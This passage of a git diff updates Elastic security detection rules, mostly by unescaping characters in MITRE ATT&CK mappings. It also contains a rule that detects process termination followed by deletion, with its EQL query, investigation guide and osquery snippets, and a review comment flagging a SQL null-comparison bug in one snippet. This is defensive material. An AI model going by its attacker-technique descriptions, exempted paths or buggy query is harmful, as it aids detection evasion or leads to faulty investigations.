{ "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json index 50bde4f7f19..3a39cbd7094 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_105.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json index 28e20721ce8..15f78976def 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_102.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json index 18ab2b04bb2..89f949c683b 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json index ddba9849d6b..31e05057692 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_104.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json index 81482ba4ca4..32aced67dc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json +++ b/packages/security_detection_engine/kibana/security_rule/083fa162-e790-4d85-9aeb-4fea04188adb_105.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json index c18bc65ad84..6b4780b92ff 100644 --- a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_1.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", 
diff --git a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json index bb2188037ff..fdd5f384efb 100644 --- a/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json +++ b/packages/security_detection_engine/kibana/security_rule/0859355c-0f08-4b43-8ff5-7d2a4789fc08_2.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json index 185d8f3e8fc..cd368df3fdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json +++ b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json index e9286828e7b..010ebf0645e 100644 --- a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json +++ b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json index 8dad377b6f4..dee56302d16 100644 --- a/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json +++ b/packages/security_detection_engine/kibana/security_rule/089db1af-740d-4d84-9a5b-babd6de143b0_3.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json index d97980692cb..e387f33b92a 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_102.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
@@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json index 654738d361a..57737882efd 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_103.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json index 24b15b9a911..d9f42c9608a 100644 
--- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json index c72b80e57ed..5bd17d4e0e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json 
@@ -41,7 +41,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json index c2942dcb9dd..e3e08e9e006 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json 
@@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json index 53c7e15ab7f..3f02f68780b 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json index 20daa1e0154..cf2f865f3ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json index 03437346d50..fdc270330a2 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by 
the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", "related_integrations": [ { @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json index bb5c07f11be..41f222b4d07 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json 
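Review bot: The `user_account == null` comparison in the note's "Osquery - Retrieve Services Running on User Accounts" snippet never evaluates true under SQLite's three-valued logic, and because it sits inside `NOT (... OR ...)` the whole predicate collapses to NULL for rows that match none of the LIKE patterns, so the query likely returns no services at all; `user_account IS NULL` is the intended form. The same snippet is repeated unchanged in the _106 and _107 hunks below and in the new _108 file, so if the numbered files are immutable snapshots the fix belongs in the source the _108 guide is generated from rather than in every version. Separately, the `query` context line excludes `C:\\Windows\\SoftwareDistribution\\*.exe` and `C:\\Windows\\WinSxS\\*.exe` with a literal drive letter while every other path in the rule uses `?:`, which is worth aligning for consistency. The enclosing `attributes` JSON object starts and ends outside the hunk.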
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by 
the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE 